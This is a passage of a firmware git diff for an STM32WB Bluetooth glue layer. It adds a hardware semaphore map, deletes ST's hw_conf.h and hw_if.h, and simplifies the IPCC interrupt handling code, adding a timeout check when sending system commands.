b/firmware/targets/f7/ble_glue/hsem_map.h new file mode 100644 index 000000000..9a5f51d20 --- /dev/null +++ b/firmware/targets/f7/ble_glue/hsem_map.h @@ -0,0 +1,81 @@ +#pragma once + +/****************************************************************************** + * Semaphores + * THIS SHALL NO BE CHANGED AS THESE SEMAPHORES ARE USED AS WELL ON THE CM0+ + *****************************************************************************/ +/** +* Index of the semaphore used the prevent conflicts after standby sleep. +* Each CPUs takes this semaphore at standby wakeup until conflicting elements are restored. +*/ +#define CFG_HW_PWR_STANDBY_SEMID 10 +/** +* The CPU2 may be configured to store the Thread persistent data either in internal NVM storage on CPU2 or in +* SRAM2 buffer provided by the user application. This can be configured with the system command SHCI_C2_Config() +* When the CPU2 is requested to store persistent data in SRAM2, it can write data in this buffer at any time when needed. +* In order to read consistent data with the CPU1 from the SRAM2 buffer, the flow should be: +* + CPU1 takes CFG_HW_THREAD_NVM_SRAM_SEMID semaphore +* + CPU1 reads all persistent data from SRAM2 (most of the time, the goal is to write these data into an NVM managed by CPU1) +* + CPU1 releases CFG_HW_THREAD_NVM_SRAM_SEMID semaphore +* CFG_HW_THREAD_NVM_SRAM_SEMID semaphore makes sure CPU2 does not update the persistent data in SRAM2 at the same time CPU1 is reading them. +* There is no timing constraint on how long this semaphore can be kept. +*/ +#define CFG_HW_THREAD_NVM_SRAM_SEMID 9 + +/** +* The CPU2 may be configured to store the BLE persistent data either in internal NVM storage on CPU2 or in +* SRAM2 buffer provided by the user application. This can be configured with the system command SHCI_C2_Config() +* When the CPU2 is requested to store persistent data in SRAM2, it can write data in this buffer at any time when needed. +* In order to read consistent data with the CPU1 from the SRAM2 buffer, the flow should be: +* + CPU1 takes CFG_HW_BLE_NVM_SRAM_SEMID semaphore +* + CPU1 reads all persistent data from SRAM2 (most of the time, the goal is to write these data into an NVM managed by CPU1) +* + CPU1 releases CFG_HW_BLE_NVM_SRAM_SEMID semaphore +* CFG_HW_BLE_NVM_SRAM_SEMID semaphore makes sure CPU2 does not update the persistent data in SRAM2 at the same time CPU1 is reading them. +* There is no timing constraint on how long this semaphore can be kept. +*/ +#define CFG_HW_BLE_NVM_SRAM_SEMID 8 + +/** +* Index of the semaphore used by CPU2 to prevent the CPU1 to either write or erase data in flash +* The CPU1 shall not either write or erase in flash when this semaphore is taken by the CPU2 +* When the CPU1 needs to either write or erase in flash, it shall first get the semaphore and release it just +* after writing a raw (64bits data) or erasing one sector. +* Once the Semaphore has been released, there shall be at least 1us before it can be taken again. This is required +* to give the opportunity to CPU2 to take it. +* On v1.4.0 and older CPU2 wireless firmware, this semaphore is unused and CPU2 is using PES bit. +* By default, CPU2 is using the PES bit to protect its timing. The CPU1 may request the CPU2 to use the semaphore +* instead of the PES bit by sending the system command SHCI_C2_SetFlashActivityControl() +*/ +#define CFG_HW_BLOCK_FLASH_REQ_BY_CPU2_SEMID 7 + +/** +* Index of the semaphore used by CPU1 to prevent the CPU2 to either write or erase data in flash +* In order to protect its timing, the CPU1 may get this semaphore to prevent the CPU2 to either +* write or erase in flash (as this will stall both CPUs) +* The PES bit shall not be used as this may stall the CPU2 in some cases. +*/ +#define CFG_HW_BLOCK_FLASH_REQ_BY_CPU1_SEMID 6 + +/** +* Index of the semaphore used to manage the CLK48 clock configuration +* When the USB is required, this semaphore shall be taken before configuring te CLK48 for USB +* and should be released after the application switch OFF the clock when the USB is not used anymore +* When using the RNG, it is good enough to use CFG_HW_RNG_SEMID to control CLK48. +* More details in AN5289 +*/ +#define CFG_HW_CLK48_CONFIG_SEMID 5 + +/* Index of the semaphore used to manage the entry Stop Mode procedure */ +#define CFG_HW_ENTRY_STOP_MODE_SEMID 4 + +/* Index of the semaphore used to access the RCC */ +#define CFG_HW_RCC_SEMID 3 + +/* Index of the semaphore used to access the FLASH */ +#define CFG_HW_FLASH_SEMID 2 + +/* Index of the semaphore used to access the PKA */ +#define CFG_HW_PKA_SEMID 1 + +/* Index of the semaphore used to access the RNG */ +#define CFG_HW_RNG_SEMID 0 diff --git a/firmware/targets/f7/ble_glue/hw_conf.h b/firmware/targets/f7/ble_glue/hw_conf.h deleted file mode 100644 index bf18a7d0e..000000000 --- a/firmware/targets/f7/ble_glue/hw_conf.h +++ /dev/null @@ -1,231 +0,0 @@ -/* USER CODE BEGIN Header */ -/** - ****************************************************************************** - * @file hw_conf.h - * @author MCD Application Team - * @brief Configuration of hardware interface - ****************************************************************************** - * @attention - * - *

© Copyright (c) 2019 STMicroelectronics. - * All rights reserved.

- * - * This software component is licensed by ST under Ultimate Liberty license - * SLA0044, the "License"; You may not use this file except in compliance with - * the License. You may obtain a copy of the License at: - * www.st.com/SLA0044 - * - ****************************************************************************** - */ -/* USER CODE END Header */ - -/* Define to prevent recursive inclusion -------------------------------------*/ -#ifndef HW_CONF_H -#define HW_CONF_H - -#include "FreeRTOSConfig.h" - -/****************************************************************************** - * Semaphores - * THIS SHALL NO BE CHANGED AS THESE SEMAPHORES ARE USED AS WELL ON THE CM0+ - *****************************************************************************/ -/** -* Index of the semaphore used the prevent conflicts after standby sleep. -* Each CPUs takes this semaphore at standby wakeup until conclicting elements are restored. -*/ -#define CFG_HW_PWR_STANDBY_SEMID 10 -/** -* The CPU2 may be configured to store the Thread persistent data either in internal NVM storage on CPU2 or in -* SRAM2 buffer provided by the user application. This can be configured with the system command SHCI_C2_Config() -* When the CPU2 is requested to store persistent data in SRAM2, it can write data in this buffer at any time when needed. -* In order to read consistent data with the CPU1 from the SRAM2 buffer, the flow should be: -* + CPU1 takes CFG_HW_THREAD_NVM_SRAM_SEMID semaphore -* + CPU1 reads all persistent data from SRAM2 (most of the time, the goal is to write these data into an NVM managed by CPU1) -* + CPU1 releases CFG_HW_THREAD_NVM_SRAM_SEMID semaphore -* CFG_HW_THREAD_NVM_SRAM_SEMID semaphore makes sure CPU2 does not update the persistent data in SRAM2 at the same time CPU1 is reading them. -* There is no timing constraint on how long this semaphore can be kept. -*/ -#define CFG_HW_THREAD_NVM_SRAM_SEMID 9 - -/** -* The CPU2 may be configured to store the BLE persistent data either in internal NVM storage on CPU2 or in -* SRAM2 buffer provided by the user application. This can be configured with the system command SHCI_C2_Config() -* When the CPU2 is requested to store persistent data in SRAM2, it can write data in this buffer at any time when needed. -* In order to read consistent data with the CPU1 from the SRAM2 buffer, the flow should be: -* + CPU1 takes CFG_HW_BLE_NVM_SRAM_SEMID semaphore -* + CPU1 reads all persistent data from SRAM2 (most of the time, the goal is to write these data into an NVM managed by CPU1) -* + CPU1 releases CFG_HW_BLE_NVM_SRAM_SEMID semaphore -* CFG_HW_BLE_NVM_SRAM_SEMID semaphore makes sure CPU2 does not update the persistent data in SRAM2 at the same time CPU1 is reading them. -* There is no timing constraint on how long this semaphore can be kept. -*/ -#define CFG_HW_BLE_NVM_SRAM_SEMID 8 - -/** -* Index of the semaphore used by CPU2 to prevent the CPU1 to either write or erase data in flash -* The CPU1 shall not either write or erase in flash when this semaphore is taken by the CPU2 -* When the CPU1 needs to either write or erase in flash, it shall first get the semaphore and release it just -* after writing a raw (64bits data) or erasing one sector. -* Once the Semaphore has been released, there shall be at least 1us before it can be taken again. This is required -* to give the opportunity to CPU2 to take it. -* On v1.4.0 and older CPU2 wireless firmware, this semaphore is unused and CPU2 is using PES bit. -* By default, CPU2 is using the PES bit to protect its timing. The CPU1 may request the CPU2 to use the semaphore -* instead of the PES bit by sending the system command SHCI_C2_SetFlashActivityControl() -*/ -#define CFG_HW_BLOCK_FLASH_REQ_BY_CPU2_SEMID 7 - -/** -* Index of the semaphore used by CPU1 to prevent the CPU2 to either write or erase data in flash -* In order to protect its timing, the CPU1 may get this semaphore to prevent the CPU2 to either -* write or erase in flash (as this will stall both CPUs) -* The PES bit shall not be used as this may stall the CPU2 in some cases. -*/ -#define CFG_HW_BLOCK_FLASH_REQ_BY_CPU1_SEMID 6 - -/** -* Index of the semaphore used to manage the CLK48 clock configuration -* When the USB is required, this semaphore shall be taken before configuring te CLK48 for USB -* and should be released after the application switch OFF the clock when the USB is not used anymore -* When using the RNG, it is good enough to use CFG_HW_RNG_SEMID to control CLK48. -* More details in AN5289 -*/ -#define CFG_HW_CLK48_CONFIG_SEMID 5 - -/* Index of the semaphore used to manage the entry Stop Mode procedure */ -#define CFG_HW_ENTRY_STOP_MODE_SEMID 4 - -/* Index of the semaphore used to access the RCC */ -#define CFG_HW_RCC_SEMID 3 - -/* Index of the semaphore used to access the FLASH */ -#define CFG_HW_FLASH_SEMID 2 - -/* Index of the semaphore used to access the PKA */ -#define CFG_HW_PKA_SEMID 1 - -/* Index of the semaphore used to access the RNG */ -#define CFG_HW_RNG_SEMID 0 - -/****************************************************************************** - * HW TIMER SERVER - *****************************************************************************/ -/** - * The user may define the maximum number of virtual timers supported. - * It shall not exceed 255 - */ -#define CFG_HW_TS_MAX_NBR_CONCURRENT_TIMER 6 - -/** - * The user may define the priority in the NVIC of the RTC_WKUP interrupt handler that is used to manage the - * wakeup timer. - * This setting is the preemptpriority part of the NVIC. - */ -#define CFG_HW_TS_NVIC_RTC_WAKEUP_IT_PREEMPTPRIO \ - (configLIBRARY_MAX_SYSCALL_INTERRUPT_PRIORITY + 1) /* FreeRTOS requirement */ - -/** - * The user may define the priority in the NVIC of the RTC_WKUP interrupt handler that is used to manage the - * wakeup timer. - * This setting is the subpriority part of the NVIC. It does not exist on all processors. When it is not supported - * on the CPU, the setting is ignored - */ -#define CFG_HW_TS_NVIC_RTC_WAKEUP_IT_SUBPRIO 0 - -/** - * Define a critical section in the Timer server - * The Timer server does not support the API to be nested - * The Application shall either: - * a) Ensure this will never happen - * b) Define the critical section - * The default implementations is masking all interrupts using the PRIMASK bit - * The TimerServer driver uses critical sections to avoid context corruption. This is achieved with the macro - * TIMER_ENTER_CRITICAL_SECTION and TIMER_EXIT_CRITICAL_SECTION. When CFG_HW_TS_USE_PRIMASK_AS_CRITICAL_SECTION is set - * to 1, all STM32 interrupts are masked with the PRIMASK bit of the CortexM CPU. It is possible to use the BASEPRI - * register of the CortexM CPU to keep allowed some interrupts with high priority. In that case, the user shall - * re-implement TIMER_ENTER_CRITICAL_SECTION and TIMER_EXIT_CRITICAL_SECTION and shall make sure that no TimerServer - * API are called when the TIMER critical section is entered - */ -#define CFG_HW_TS_USE_PRIMASK_AS_CRITICAL_SECTION 1 - -/** - * This value shall reflect the maximum delay there could be in the application between the time the RTC interrupt - * is generated by the Hardware and the time when the RTC interrupt handler is called. This time is measured in - * number of RTCCLK ticks. - * A relaxed timing would be 10ms - * When the value is too short, the timerserver will not be able to count properly and all timeout may be random. - * When the value is too long, the device may wake up more often than the most optimal configuration. However, the - * impact on power consumption would be marginal (unless the value selected is extremely too long). It is strongly - * recommended to select a value large enough to make sure it is not too short to ensure reliability of the system - * as this will have marginal impact on low power mode - */ -#define CFG_HW_TS_RTC_HANDLER_MAX_DELAY (10 * (LSI_VALUE / 1000)) - -/** - * Interrupt ID in the NVIC of the RTC Wakeup interrupt handler - * It shall be type of IRQn_Type - */ -#define CFG_HW_TS_RTC_WAKEUP_HANDLER_ID RTC_WKUP_IRQn - -/****************************************************************************** - * HW UART - *****************************************************************************/ -#define CFG_HW_LPUART1_ENABLED 0 -#define CFG_HW_LPUART1_DMA_TX_SUPPORTED 0 - -#define CFG_HW_USART1_ENABLED 1 -#define CFG_HW_USART1_DMA_TX_SUPPORTED 1 - -/** - * UART1 - */ -#define CFG_HW_USART1_PREEMPTPRIORITY 0x0F -#define CFG_HW_USART1_SUBPRIORITY 0 - -/** < The application shall check the selected source clock is enable */ -#define CFG_HW_USART1_SOURCE_CLOCK RCC_USART1CLKSOURCE_SYSCLK - -#define CFG_HW_USART1_BAUDRATE 115200 -#define CFG_HW_USART1_WORDLENGTH UART_WORDLENGTH_8B -#define CFG_HW_USART1_STOPBITS UART_STOPBITS_1 -#define CFG_HW_USART1_PARITY UART_PARITY_NONE -#define CFG_HW_USART1_HWFLOWCTL UART_HWCONTROL_NONE -#define CFG_HW_USART1_MODE UART_MODE_TX_RX -#define CFG_HW_USART1_ADVFEATUREINIT UART_ADVFEATURE_NO_INIT -#define CFG_HW_USART1_OVERSAMPLING UART_OVERSAMPLING_8 - -#define CFG_HW_USART1_TX_PORT_CLK_ENABLE __HAL_RCC_GPIOB_CLK_ENABLE -#define CFG_HW_USART1_TX_PORT GPIOB -#define CFG_HW_USART1_TX_PIN GPIO_PIN_6 -#define CFG_HW_USART1_TX_MODE GPIO_MODE_AF_PP -#define CFG_HW_USART1_TX_PULL GPIO_NOPULL -#define CFG_HW_USART1_TX_SPEED GPIO_SPEED_FREQ_VERY_HIGH -#define CFG_HW_USART1_TX_ALTERNATE GPIO_AF7_USART1 - -#define CFG_HW_USART1_RX_PORT_CLK_ENABLE __HAL_RCC_GPIOB_CLK_ENABLE -#define CFG_HW_USART1_RX_PORT GPIOB -#define CFG_HW_USART1_RX_PIN GPIO_PIN_7 -#define CFG_HW_USART1_RX_MODE GPIO_MODE_AF_PP -#define CFG_HW_USART1_RX_PULL GPIO_NOPULL -#define CFG_HW_USART1_RX_SPEED GPIO_SPEED_FREQ_VERY_HIGH -#define CFG_HW_USART1_RX_ALTERNATE GPIO_AF7_USART1 - -#define CFG_HW_USART1_CTS_PORT_CLK_ENABLE __HAL_RCC_GPIOA_CLK_ENABLE -#define CFG_HW_USART1_CTS_PORT GPIOA -#define CFG_HW_USART1_CTS_PIN GPIO_PIN_11 -#define CFG_HW_USART1_CTS_MODE GPIO_MODE_AF_PP -#define CFG_HW_USART1_CTS_PULL GPIO_PULLDOWN -#define CFG_HW_USART1_CTS_SPEED GPIO_SPEED_FREQ_VERY_HIGH -#define CFG_HW_USART1_CTS_ALTERNATE GPIO_AF7_USART1 - -#define CFG_HW_USART1_DMA_TX_PREEMPTPRIORITY 0x0F -#define CFG_HW_USART1_DMA_TX_SUBPRIORITY 0 - -#define CFG_HW_USART1_DMAMUX_CLK_ENABLE __HAL_RCC_DMAMUX1_CLK_ENABLE -#define CFG_HW_USART1_DMA_CLK_ENABLE __HAL_RCC_DMA2_CLK_ENABLE -#define CFG_HW_USART1_TX_DMA_REQ DMA_REQUEST_USART1_TX -#define CFG_HW_USART1_TX_DMA_CHANNEL DMA2_Channel4 -#define CFG_HW_USART1_TX_DMA_IRQn DMA2_Channel4_IRQn -#define CFG_HW_USART1_DMA_TX_IRQHandler DMA2_Channel4_IRQHandler - -#endif /*HW_CONF_H */ - -/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/firmware/targets/f7/ble_glue/hw_if.h b/firmware/targets/f7/ble_glue/hw_if.h deleted file mode 100644 index a0ac23df3..000000000 --- a/firmware/targets/f7/ble_glue/hw_if.h +++ /dev/null @@ -1,102 +0,0 @@ -/* USER CODE BEGIN Header */ -/** - ****************************************************************************** - * @file hw_if.h - * @author MCD Application Team - * @brief Hardware Interface - ****************************************************************************** - * @attention - * - *

© Copyright (c) 2019 STMicroelectronics. - * All rights reserved.

- * - * This software component is licensed by ST under Ultimate Liberty license - * SLA0044, the "License"; You may not use this file except in compliance with - * the License. You may obtain a copy of the License at: - * www.st.com/SLA0044 - * - ****************************************************************************** - */ -/* USER CODE END Header */ - -/* Define to prevent recursive inclusion -------------------------------------*/ -#ifndef HW_IF_H -#define HW_IF_H - -#ifdef __cplusplus -extern "C" { -#endif - -/* Includes ------------------------------------------------------------------*/ -#include "stm32wbxx.h" -#include "stm32wbxx_ll_exti.h" -#include "stm32wbxx_ll_system.h" -#include "stm32wbxx_ll_rcc.h" -#include "stm32wbxx_ll_ipcc.h" -#include "stm32wbxx_ll_bus.h" -#include "stm32wbxx_ll_pwr.h" -#include "stm32wbxx_ll_cortex.h" -#include "stm32wbxx_ll_utils.h" -#include "stm32wbxx_ll_hsem.h" -#include "stm32wbxx_ll_gpio.h" -#include "stm32wbxx_ll_rtc.h" - -#ifdef USE_STM32WBXX_USB_DONGLE -#include "stm32wbxx_usb_dongle.h" -#endif -#ifdef USE_STM32WBXX_NUCLEO -#include "stm32wbxx_nucleo.h" -#endif -#ifdef USE_X_NUCLEO_EPD -#include "x_nucleo_epd.h" -#endif - -/* Private includes ----------------------------------------------------------*/ -/* USER CODE BEGIN Includes */ - -/* USER CODE END Includes */ - -/****************************************************************************** - * HW UART - ******************************************************************************/ -typedef enum { - hw_uart1, - hw_uart2, - hw_lpuart1, -} hw_uart_id_t; - -typedef enum { - hw_uart_ok, - hw_uart_error, - hw_uart_busy, - hw_uart_to, -} hw_status_t; - -void HW_UART_Init(hw_uart_id_t hw_uart_id); -void HW_UART_Receive_IT( - hw_uart_id_t hw_uart_id, - uint8_t* pData, - uint16_t Size, - void (*Callback)(void)); -void HW_UART_Transmit_IT( - hw_uart_id_t hw_uart_id, - uint8_t* pData, - uint16_t Size, - void (*Callback)(void)); -hw_status_t - HW_UART_Transmit(hw_uart_id_t hw_uart_id, uint8_t* p_data, uint16_t size, uint32_t timeout); -hw_status_t HW_UART_Transmit_DMA( - hw_uart_id_t hw_uart_id, - uint8_t* p_data, - uint16_t size, - void (*Callback)(void)); -void HW_UART_Interrupt_Handler(hw_uart_id_t hw_uart_id); -void HW_UART_DMA_Interrupt_Handler(hw_uart_id_t hw_uart_id); - -#ifdef __cplusplus -} -#endif - -#endif /*HW_IF_H */ - -/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/firmware/targets/f7/ble_glue/hw_ipcc.c b/firmware/targets/f7/ble_glue/hw_ipcc.c index 7c84df09f..c2397f351 100644 --- a/firmware/targets/f7/ble_glue/hw_ipcc.c +++ b/firmware/targets/f7/ble_glue/hw_ipcc.c @@ -1,160 +1,52 @@ -/** - ****************************************************************************** - * File Name : Target/hw_ipcc.c - * Description : Hardware IPCC source file for STM32WPAN Middleware. - * - ****************************************************************************** - * @attention - * - *

© Copyright (c) 2020 STMicroelectronics. - * All rights reserved.

- * - * This software component is licensed by ST under Ultimate Liberty license - * SLA0044, the "License"; You may not use this file except in compliance with - * the License. You may obtain a copy of the License at: - * www.st.com/SLA0044 - * - ****************************************************************************** - */ - -/* Includes ------------------------------------------------------------------*/ #include "app_common.h" #include +#include +#include -/* Global variables ---------------------------------------------------------*/ -/* Private defines -----------------------------------------------------------*/ -#define HW_IPCC_TX_PENDING(channel) \ - (!(LL_C1_IPCC_IsActiveFlag_CHx(IPCC, channel))) && (((~(IPCC->C1MR)) & ((channel) << 16U))) -#define HW_IPCC_RX_PENDING(channel) \ - (LL_C2_IPCC_IsActiveFlag_CHx(IPCC, channel)) && (((~(IPCC->C1MR)) & ((channel) << 0U))) +#include +#include -/* Private macros ------------------------------------------------------------*/ -/* Private typedef -----------------------------------------------------------*/ -/* Private variables ---------------------------------------------------------*/ -static void (*FreeBufCb)(void); +#include -/* Private function prototypes -----------------------------------------------*/ -static void HW_IPCC_BLE_EvtHandler(void); -static void HW_IPCC_BLE_AclDataEvtHandler(void); -static void HW_IPCC_MM_FreeBufHandler(void); -static void HW_IPCC_SYS_CmdEvtHandler(void); -static void HW_IPCC_SYS_EvtHandler(void); -static void HW_IPCC_TRACES_EvtHandler(void); +#define HW_IPCC_TX_PENDING(channel) \ + ((!(LL_C1_IPCC_IsActiveFlag_CHx(IPCC, channel))) && \ + LL_C1_IPCC_IsEnabledTransmitChannel(IPCC, channel)) +#define HW_IPCC_RX_PENDING(channel) \ + (LL_C2_IPCC_IsActiveFlag_CHx(IPCC, channel) && \ + LL_C1_IPCC_IsEnabledReceiveChannel(IPCC, channel)) -#ifdef THREAD_WB -static void HW_IPCC_OT_CmdEvtHandler(void); -static void HW_IPCC_THREAD_NotEvtHandler(void); -static void HW_IPCC_THREAD_CliNotEvtHandler(void); -#endif +static void (*FreeBufCb)(); -#ifdef LLD_TESTS_WB -static void HW_IPCC_LLDTESTS_ReceiveCliRspHandler(void); -static void HW_IPCC_LLDTESTS_ReceiveM0CmdHandler(void); -#endif -#ifdef LLD_BLE_WB -/*static void HW_IPCC_LLD_BLE_ReceiveCliRspHandler( void );*/ -static void HW_IPCC_LLD_BLE_ReceiveRspHandler(void); -static void HW_IPCC_LLD_BLE_ReceiveM0CmdHandler(void); -#endif +static void HW_IPCC_BLE_EvtHandler(); +static void HW_IPCC_BLE_AclDataEvtHandler(); +static void HW_IPCC_MM_FreeBufHandler(); +static void HW_IPCC_SYS_CmdEvtHandler(); +static void HW_IPCC_SYS_EvtHandler(); +static void HW_IPCC_TRACES_EvtHandler(); -#ifdef MAC_802_15_4_WB -static void HW_IPCC_MAC_802_15_4_CmdEvtHandler(void); -static void HW_IPCC_MAC_802_15_4_NotEvtHandler(void); -#endif - -#ifdef ZIGBEE_WB -static void HW_IPCC_ZIGBEE_CmdEvtHandler(void); -static void HW_IPCC_ZIGBEE_StackNotifEvtHandler(void); -static void HW_IPCC_ZIGBEE_StackM0RequestHandler(void); -#endif - -/* Public function definition -----------------------------------------------*/ - -/****************************************************************************** - * INTERRUPT HANDLER - ******************************************************************************/ -void HW_IPCC_Rx_Handler(void) { +void HW_IPCC_Rx_Handler() { if(HW_IPCC_RX_PENDING(HW_IPCC_SYSTEM_EVENT_CHANNEL)) { HW_IPCC_SYS_EvtHandler(); - } -#ifdef MAC_802_15_4_WB - else if(HW_IPCC_RX_PENDING(HW_IPCC_MAC_802_15_4_NOTIFICATION_ACK_CHANNEL)) { - HW_IPCC_MAC_802_15_4_NotEvtHandler(); - } -#endif /* MAC_802_15_4_WB */ -#ifdef THREAD_WB - else if(HW_IPCC_RX_PENDING(HW_IPCC_THREAD_NOTIFICATION_ACK_CHANNEL)) { - HW_IPCC_THREAD_NotEvtHandler(); - } else if(HW_IPCC_RX_PENDING(HW_IPCC_THREAD_CLI_NOTIFICATION_ACK_CHANNEL)) { - HW_IPCC_THREAD_CliNotEvtHandler(); - } -#endif /* THREAD_WB */ -#ifdef LLD_TESTS_WB - else if(HW_IPCC_RX_PENDING(HW_IPCC_LLDTESTS_CLI_RSP_CHANNEL)) { - HW_IPCC_LLDTESTS_ReceiveCliRspHandler(); - } else if(HW_IPCC_RX_PENDING(HW_IPCC_LLDTESTS_M0_CMD_CHANNEL)) { - HW_IPCC_LLDTESTS_ReceiveM0CmdHandler(); - } -#endif /* LLD_TESTS_WB */ -#ifdef LLD_BLE_WB - else if(HW_IPCC_RX_PENDING(HW_IPCC_LLD_BLE_RSP_CHANNEL)) { - HW_IPCC_LLD_BLE_ReceiveRspHandler(); - } else if(HW_IPCC_RX_PENDING(HW_IPCC_LLD_BLE_M0_CMD_CHANNEL)) { - HW_IPCC_LLD_BLE_ReceiveM0CmdHandler(); - } -#endif /* LLD_TESTS_WB */ -#ifdef ZIGBEE_WB - else if(HW_IPCC_RX_PENDING(HW_IPCC_ZIGBEE_APPLI_NOTIF_ACK_CHANNEL)) { - HW_IPCC_ZIGBEE_StackNotifEvtHandler(); - } else if(HW_IPCC_RX_PENDING(HW_IPCC_ZIGBEE_M0_REQUEST_CHANNEL)) { - HW_IPCC_ZIGBEE_StackM0RequestHandler(); - } -#endif /* ZIGBEE_WB */ - else if(HW_IPCC_RX_PENDING(HW_IPCC_BLE_EVENT_CHANNEL)) { + } else if(HW_IPCC_RX_PENDING(HW_IPCC_BLE_EVENT_CHANNEL)) { HW_IPCC_BLE_EvtHandler(); } else if(HW_IPCC_RX_PENDING(HW_IPCC_TRACES_CHANNEL)) { HW_IPCC_TRACES_EvtHandler(); } - - return; } -void HW_IPCC_Tx_Handler(void) { +void HW_IPCC_Tx_Handler() { if(HW_IPCC_TX_PENDING(HW_IPCC_SYSTEM_CMD_RSP_CHANNEL)) { HW_IPCC_SYS_CmdEvtHandler(); - } -#ifdef MAC_802_15_4_WB - else if(HW_IPCC_TX_PENDING(HW_IPCC_MAC_802_15_4_CMD_RSP_CHANNEL)) { - HW_IPCC_MAC_802_15_4_CmdEvtHandler(); - } -#endif /* MAC_802_15_4_WB */ -#ifdef THREAD_WB - else if(HW_IPCC_TX_PENDING(HW_IPCC_THREAD_OT_CMD_RSP_CHANNEL)) { - HW_IPCC_OT_CmdEvtHandler(); - } -#endif /* THREAD_WB */ -#ifdef LLD_TESTS_WB -// No TX handler for LLD tests -#endif /* LLD_TESTS_WB */ -#ifdef ZIGBEE_WB - if(HW_IPCC_TX_PENDING(HW_IPCC_ZIGBEE_CMD_APPLI_CHANNEL)) { - HW_IPCC_ZIGBEE_CmdEvtHandler(); - } -#endif /* ZIGBEE_WB */ - else if(HW_IPCC_TX_PENDING(HW_IPCC_SYSTEM_CMD_RSP_CHANNEL)) { + } else if(HW_IPCC_TX_PENDING(HW_IPCC_SYSTEM_CMD_RSP_CHANNEL)) { HW_IPCC_SYS_CmdEvtHandler(); } else if(HW_IPCC_TX_PENDING(HW_IPCC_MM_RELEASE_BUFFER_CHANNEL)) { HW_IPCC_MM_FreeBufHandler(); } else if(HW_IPCC_TX_PENDING(HW_IPCC_HCI_ACL_DATA_CHANNEL)) { HW_IPCC_BLE_AclDataEvtHandler(); } - - return; } -/****************************************************************************** - * GENERAL - ******************************************************************************/ -void HW_IPCC_Enable(void) { + +void HW_IPCC_Enable() { /** * Such as IPCC IP available to the CPU2, it is required to keep the IPCC clock running when FUS is running on CPU2 and CPU1 enters deep sleep mode @@ -177,11 +69,9 @@ void HW_IPCC_Enable(void) { __SEV(); /* Set the internal event flag and send an event to the CPU2 */ __WFE(); /* Clear the internal event flag */ LL_PWR_EnableBootC2(); - - return; } -void HW_IPCC_Init(void) { +void HW_IPCC_Init() { LL_C1_IPCC_EnableIT_RXO(IPCC); LL_C1_IPCC_EnableIT_TXF(IPCC); @@ -189,366 +79,62 @@ void HW_IPCC_Init(void) { NVIC_EnableIRQ(IPCC_C1_RX_IRQn); NVIC_SetPriority(IPCC_C1_TX_IRQn, NVIC_EncodePriority(NVIC_GetPriorityGrouping(), 6, 0)); NVIC_EnableIRQ(IPCC_C1_TX_IRQn); - - return; } -/****************************************************************************** - * BLE - ******************************************************************************/ -void HW_IPCC_BLE_Init(void) { +void HW_IPCC_BLE_Init() { LL_C1_IPCC_EnableReceiveChannel(IPCC, HW_IPCC_BLE_EVENT_CHANNEL); - - return; } -void HW_IPCC_BLE_SendCmd(void) { +void HW_IPCC_BLE_SendCmd() { LL_C1_IPCC_SetFlag_CHx(IPCC, HW_IPCC_BLE_CMD_CHANNEL); - - return; } -static void HW_IPCC_BLE_EvtHandler(void) { +static void HW_IPCC_BLE_EvtHandler() { HW_IPCC_BLE_RxEvtNot(); LL_C1_IPCC_ClearFlag_CHx(IPCC, HW_IPCC_BLE_EVENT_CHANNEL); - - return; } -void HW_IPCC_BLE_SendAclData(void) { +void HW_IPCC_BLE_SendAclData() { LL_C1_IPCC_SetFlag_CHx(IPCC, HW_IPCC_HCI_ACL_DATA_CHANNEL); LL_C1_IPCC_EnableTransmitChannel(IPCC, HW_IPCC_HCI_ACL_DATA_CHANNEL); - - return; } -static void HW_IPCC_BLE_AclDataEvtHandler(void) { +static void HW_IPCC_BLE_AclDataEvtHandler() { LL_C1_IPCC_DisableTransmitChannel(IPCC, HW_IPCC_HCI_ACL_DATA_CHANNEL); HW_IPCC_BLE_AclDataAckNot(); - - return; } -__weak void HW_IPCC_BLE_AclDataAckNot(void){}; -__weak void HW_IPCC_BLE_RxEvtNot(void){}; - -/****************************************************************************** - * SYSTEM - ******************************************************************************/ -void HW_IPCC_SYS_Init(void) { +void HW_IPCC_SYS_Init() { LL_C1_IPCC_EnableReceiveChannel(IPCC, HW_IPCC_SYSTEM_EVENT_CHANNEL); - - return; } -void HW_IPCC_SYS_SendCmd(void) { +void HW_IPCC_SYS_SendCmd() { LL_C1_IPCC_SetFlag_CHx(IPCC, HW_IPCC_SYSTEM_CMD_RSP_CHANNEL); - LL_C1_IPCC_EnableTransmitChannel(IPCC, HW_IPCC_SYSTEM_CMD_RSP_CHANNEL); - return; + FuriHalCortexTimer timer = furi_hal_cortex_timer_get(33000000); + + while(LL_C1_IPCC_IsActiveFlag_CHx(IPCC, HW_IPCC_SYSTEM_CMD_RSP_CHANNEL)) { + furi_check(!furi_hal_cortex_timer_is_expired(timer), "HW_IPCC_SYS_SendCmd timeout"); + } + + HW_IPCC_SYS_CmdEvtHandler(); } -static void HW_IPCC_SYS_CmdEvtHandler(void) { +static void HW_IPCC_SYS_CmdEvtHandler() { LL_C1_IPCC_DisableTransmitChannel(IPCC, HW_IPCC_SYSTEM_CMD_RSP_CHANNEL); HW_IPCC_SYS_CmdEvtNot(); - - return; } -static void HW_IPCC_SYS_EvtHandler(void) { +static void HW_IPCC_SYS_EvtHandler() { HW_IPCC_SYS_EvtNot(); LL_C1_IPCC_ClearFlag_CHx(IPCC, HW_IPCC_SYSTEM_EVENT_CHANNEL); - - return; } -__weak void HW_IPCC_SYS_CmdEvtNot(void){}; -__weak void HW_IPCC_SYS_EvtNot(void){}; - -/****************************************************************************** - * MAC 802.15.4 - ******************************************************************************/ -#ifdef MAC_802_15_4_WB -void HW_IPCC_MAC_802_15_4_Init(void) { - LL_C1_IPCC_EnableReceiveChannel(IPCC, HW_IPCC_MAC_802_15_4_NOTIFICATION_ACK_CHANNEL); - - return; -} - -void HW_IPCC_MAC_802_15_4_SendCmd(void) { - LL_C1_IPCC_SetFlag_CHx(IPCC, HW_IPCC_MAC_802_15_4_CMD_RSP_CHANNEL); - LL_C1_IPCC_EnableTransmitChannel(IPCC, HW_IPCC_MAC_802_15_4_CMD_RSP_CHANNEL); - - return; -} - -void HW_IPCC_MAC_802_15_4_SendAck(void) { - LL_C1_IPCC_ClearFlag_CHx(IPCC, HW_IPCC_MAC_802_15_4_NOTIFICATION_ACK_CHANNEL); - LL_C1_IPCC_EnableReceiveChannel(IPCC, 